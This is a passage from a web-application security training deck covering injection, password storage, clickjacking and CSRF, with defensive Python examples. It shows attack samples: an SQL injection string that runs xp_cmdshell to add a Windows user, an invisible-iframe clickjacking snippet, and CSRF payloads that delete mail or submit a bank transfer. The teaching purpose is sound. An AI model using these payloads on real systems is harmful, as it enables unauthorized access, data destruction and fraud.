Attacker circumvents the listbox control and injects:

    a%' exec master..xp_cmdshell 'net user test testpass /ADD' --

Resulting in:

    "SELECT * FROM products WHERE id LIKE '%a%' exec master..xp_cmdshell 'net user test testpass /ADD' --%'";

Page 76: Ebu class edgescan-2017

Command Injection

Web applications may use input parameters as arguments for OS scripts or executables. Almost every application platform provides a mechanism to execute local operating system commands from application code.

Most operating systems support multiple commands being executed from the same command line. Multiple commands are typically separated with the pipe “|” or ampersand “&” characters.

• Perl: system(), exec(), backquotes (``)
• C/C++: system(), popen(), backquotes (``)
• ASP: wscript.shell
• Java: getRuntime().exec()
• MS-SQL Server: master..xp_cmdshell
• PHP: include(), require(), eval(), shell_exec()

Page 77: Ebu class edgescan-2017

Where can I learn more?

LDAP Injection
https://www.owasp.org/index.php/LDAP_injection
https://www.owasp.org/index.php/Testing_for_LDAP_Injection_(OWASP-DV-006)

SQL Injection
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet

Command Injection
https://www.owasp.org/index.php/Command_Injection

Page 78: Ebu class edgescan-2017

Secure Password Storage

• Verify Only
• Add Entropy
• Slow Down

Page 79: Ebu class edgescan-2017

Hashing

    md5("password")    = 5f4dcc3b5aa765d61d8327deb882cf99
    sha1("password")   = 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

MD5 and SHA1 are old and should not be used anymore.

    sha256("password") = 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8

SHA256 = stronger, but still weak and easily broken using rainbow tables.

Page 80: Ebu class edgescan-2017

Top Passwords!

Page 81: Ebu class edgescan-2017

Salting

We need to add entropy - Salting

A salt is a random, unique token stored with each password.

    Hash = h(password + salt)

Let's say the salt is 5aP3v*4!1bN<x4i&3 and the hash is 9537340ced96de413e8534b542f38089c65edff3.

Now your database of passwords is useless, because nobody has rainbow tables that include that hash.

It's computationally infeasible to generate rainbow tables for every possible salt.

So now we've forced the bad guys to start cracking the hashes again.

In this case, it'd be pretty easy to crack since I used a bad password, but it's still better than him being able to look it up in a tenth of a second!

Page 82: Ebu class edgescan-2017

Secure Password Storage, Java Example

    public String hash(String password, String userSalt, int iterations) throws EncryptionException {
        byte[] bytes = null;
        try {
            MessageDigest digest = MessageDigest.getInstance(hashAlgorithm);
            digest.reset();
            digest.update(ESAPI.securityConfiguration().getMasterSalt());
            digest.update(userSalt.getBytes(encoding));
            digest.update(password.getBytes(encoding));

            // rehash a number of times to help strengthen weak passwords
            bytes = digest.digest();
            for (int i = 0; i < iterations; i++) {
                digest.reset();
                bytes = digest.digest(bytes);
            }
            String encoded = ESAPI.encoder().encodeForBase64(bytes, false);
            return encoded;
        } catch (Exception ex) {
            throw new EncryptionException("Internal error", "Error");
        }
    }

Page 83: Ebu class edgescan-2017

Standardized Algorithms for Password Storage

bcrypt / scrypt
- Adaptive hash
- Very slow (work factor)
- Blowfish derived
- Single-use salt

Why scrypt over bcrypt?
- Much more secure than bcrypt
- Designed to defend against large-scale hardware attacks
- There is a scrypt library for most major scripting languages (Python, Ruby etc.)
- CAUTION: New algorithm (2009)
- CAUTION: Scalability problems
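"Verify only, add entropy, slow down" in one place, as an added Python example (not from the deck or ESAPI): the unsalted SHA-256 that a rainbow table looks up, beside a per-password random salt and a PBKDF2-HMAC-SHA256 work factor, with verification by recomputation and constant-time comparison. PBKDF2 is used here because it ships in the standard library; the iteration count and the storage format are assumptions.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 210_000  # assumed work factor; raise it until one hash costs ~100 ms on your hardware
SALT_BYTES = 16


def unsalted_sha256(password: str) -> str:
    """What the deck warns against: one precomputed table cracks every database."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Add entropy (fresh random salt) and slow down (PBKDF2 iterations).

    Assumed storage format: algorithm$iterations$salt_b64$hash_b64. The salt and
    iteration count are stored alongside the hash; neither needs to be secret.
    """
    salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256${}${}${}".format(
        iterations,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def verify_password(password: str, stored: str) -> bool:
    """Verify only: the stored value is recomputed, never decrypted."""
    try:
        scheme, iterations, salt_b64, digest_b64 = stored.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    except (ValueError, TypeError):
        return False  # malformed record: fail closed
    # Constant-time comparison so timing does not reveal how many bytes matched.
    return hmac.compare_digest(candidate, expected)
```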

Page 84: Ebu class edgescan-2017

Forgot Password Secure Design

– Require identity and security questions
  • Last name, account number, email, DOB
  • Enforce lockout policy
  • Ask one or more good security questions
– Send the user a randomly generated token via an out-of-band method
  • email, SMS or token
– Verify code in the same web session
  • Enforce lockout policy
– Change password
  • Enforce password policy

Page 85: Ebu class edgescan-2017

Multi Factor Authentication

• Passwords as a single authentication credential are DEAD, even for consumer services.
• Mobile devices as a “what you have” factor
• SMS and native mobile apps for MFA
  » Not perfect, but heavily reduce risk vs. passwords only
• Password strength and password policy become less important
• You protect your magic user and fireball wand with MFA
• Protect your multi-billion dollar enterprise with MFA

MFA FTW

Page 86: Ebu class edgescan-2017

Clickjacking

Page 87: Ebu class edgescan-2017

First, make a tempting site

Page 88: Ebu class edgescan-2017

<iframe src="http://mail.google.com">

Page 89: Ebu class edgescan-2017

iframe is invisible, but still clickable!

Page 90: Ebu class edgescan-2017

    <style>
    iframe {
        width: 300px;
        height: 100px;
        position: absolute;
        top: 0;
        left: 0;
        filter: alpha(opacity=00);
        opacity: 0.0;
    }
    </style>

    <iframe src="https://mail.google.com">

Page 91: Ebu class edgescan-2017

X-Frame-Options HTTP Response Header

    // to prevent all framing of this content
    response.addHeader("X-FRAME-OPTIONS", "DENY");

    // to allow framing of this content only by this site
    response.addHeader("X-FRAME-OPTIONS", "SAMEORIGIN");

    // to allow framing from a specific domain
    response.addHeader("X-FRAME-OPTIONS", "ALLOW-FROM X");

Page 92: Ebu class edgescan-2017

Encryption in Transit HTTPS/TLS

• Sensitive data must be encrypted in transit via HTTPS/SSL
  • Starting when the login form is rendered
  • Until logout is complete
  • Confidentiality, Integrity and Authenticity
• OWASP HTTPS best practices: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
• HSTS (Strict Transport Security) can help here
• Certificate Pinning can help here

Page 93: Ebu class edgescan-2017

Cross Site Request Forgery (CSRF)

Page 94: Ebu class edgescan-2017

Where are we going?

• Dangerous Cookie Behavior
• Attacking Sensitive Transactions
• Real World Cross Site Request Forgery
• Synchronizer Token Pattern
• XSS Defense Criticality
• Re-Authentication

Page 95: Ebu class edgescan-2017

<html><body><img src="https://mail.google.com/deleteAllMsgs?confirm=true" height=1 width=1/></body></html>

What will the browser submit?

Page 96: Ebu class edgescan-2017

Attacking Sensitive Transactions

Cross-Site Request Forgery (XSRF/CSRF) attacks the trust a web application has for authenticated users:
• Browser instances share cookies
• Users typically browse multiple sites simultaneously
• Attackers can abuse the shared cookie jar to send requests as the authenticated user

Once authenticated, users are trusted throughout the lifetime of their session. Applications do not require users to re-authenticate when executing sensitive transactions.

Page 97: Ebu class edgescan-2017

Anatomy of a CSRF Attack

Consider a consumer banking application that contains the following form:

    <form action="http://site.com/Transfer.asp" method="POST" id="form1">
        <p>Account Num: <input type="text" name="acct" value="2345"/></p>
        <p>Transfer Amt: <input type="text" name="amount" value="10000"/></p>
    </form>
    <script>document.getElementById("form1").submit();</script>

This form will generate requests that resemble the following:

    GET http://www.example.com/Transfer.asp?acct=##&amount=##

Page 98: Ebu class edgescan-2017

Cross-Site Request Forgery

Page 99: Ebu class edgescan-2017

What is the Result?

• When the <img> tag loads, the attacker's web site will send a request to the consumer banking application.
• The user's browser will attach the appropriate cookie to the attacker's forged request, thus “authenticating” it.
• The banking application will verify that the cookie is valid and process the request.
• The attacker cannot see the resultant response from the forged request. Does that matter?

Page 100: Ebu class edgescan-2017

Real World CSRF Attacks

• Real-world CSRF attack hijacks the DNS server configuration of TP-Link routers. DNS altered to a malicious server; all requests from the router re-routed to malicious sites. - 2014
• PayPal profile hacking: alter arbitrary people's PayPal profile via CSRF - 2016
• 135 million ARRIS (Motorola) SURFboard modems: unauthenticated reboot flaw via CSRF - 2016

Page 101: Ebu class edgescan-2017

Modem CSRF example

Page 102: Ebu class edgescan-2017

CSRF within the Internal Network

CSRF allows external attackers to launch attacks against internal applications! It runs in the user's browser.

External web sites can trick your browser into making requests on the internal network.

Even easier against single sign-on: effectively you are always logged into internal applications.

All internal applications must be protected against CSRF.

Page 103: Ebu class edgescan-2017

CSRF Defenses

• Requests that cause side effects should use the POST method. Alone, this is not sufficient.
• Validation of the HTTP Referer header (not recommended): tracking valid referring pages may be problematic, and it is easy to spoof (but getting more difficult).
• Require users to re-authenticate
• Cryptographic tokens

Page 104: Ebu class edgescan-2017

Synchronizer Token Pattern

“Hidden” token in HTML.

Value defined by the server when the page is rendered. Value is stored in the session. Consider leveraging the java.security.SecureRandom class for Java applications.

Upon submit, the token is sent with the form.

The token value must match the value in the session.

An attacker would not have the token value. (An XSS attack could get the token if the page was vulnerable to XSS.)

    <form action="/transfer.do" method="post">
        <input type="hidden" name="CSRFToken" value="OWY4NmQwODE4ODRjN2Q2NTlhMmZlYWEwYzU1YWQwMTVhM2JmNGYxYjJiMGI4MjJjZDE1ZDZjMTViMGYwMGEwOA==">
        …
    </form>

See also:
https://www.owasp.org/index.php/Category:OWASP_CSRFGuard_Project
https://www.owasp.org/index.php/PHP_CSRF_Guard
https://www.owasp.org/index.php/.Net_CSRF_Guard
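The synchronizer token pattern end to end, as an added Python example (not from the deck or CSRFGuard): the token is generated with a CSPRNG when the transfer form is rendered, stored in the session, and the handler accepts only a POST whose CSRFToken field equals the session's value. The session dict, the form fields and the handler's return values are assumptions; the forged request from the deck's banking example is the one that carries no token.

```python
import hmac
import secrets
from urllib.parse import parse_qs


def issue_csrf_token(session: dict) -> str:
    # Generated with a CSPRNG when the page is rendered and kept in the session
    # (the Python counterpart of java.security.SecureRandom in the deck).
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def render_transfer_form(session: dict) -> str:
    """Render the deck's transfer form with the hidden CSRFToken field."""
    token = issue_csrf_token(session)
    return (
        '<form action="/transfer.do" method="post">'
        f'<input type="hidden" name="CSRFToken" value="{token}">'
        '<p>Account Num: <input type="text" name="acct"></p>'
        '<p>Transfer Amt: <input type="text" name="amount"></p>'
        "</form>"
    )


def handle_transfer(session: dict, method: str, body: str):
    """Server side of /transfer.do. Returns (status, message).

    A cross-site page can make the browser send this request with the victim's
    cookie, but it cannot read the victim's page and so cannot learn the token.
    """
    if method != "POST":
        return 405, "state-changing requests must use POST"
    fields = parse_qs(body)
    expected = session.get("csrf_token")
    submitted = fields.get("CSRFToken", [""])[0]
    # compare_digest keeps the comparison constant-time; an empty or foreign
    # session has no expected token and is rejected outright.
    if not expected or not hmac.compare_digest(expected, submitted):
        return 403, "CSRF token missing or invalid"
    acct = fields.get("acct", ["?"])[0]
    amount = fields.get("amount", ["?"])[0]
    return 200, f"transfer of {amount} to account {acct} accepted"
```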

Page 105: Ebu class edgescan-2017

Challenge-Response

Challenge-Response is another defense option for CSRF.

The following are some examples of challenge-response options:
• CAPTCHA
• Re-Authentication (password)
• One-time Token

While challenge-response is a very strong defense to CSRF (assuming proper implementation), it does impact user experience. For applications in need of high security, tokens (transparent) and challenge-response should be used on high-risk functions.

Page 106: Ebu class edgescan-2017

Other CSRF Defenses

• Require users to re-authenticate
  Amazon.com does this *really* well
• Double-cookie submit defense
  Decent defense, but not based on randomness; based on SOP

Page 107: Ebu class edgescan-2017

Summary

• Dangerous Cookie Behavior
• Attacking Sensitive Transactions
• Real World Cross Site Request Forgery
• Synchronizer Token Pattern
• XSS Defense Criticality
• Re-Authentication

Page 108: Ebu class edgescan-2017

Thank YOU!

[email protected]@edgescan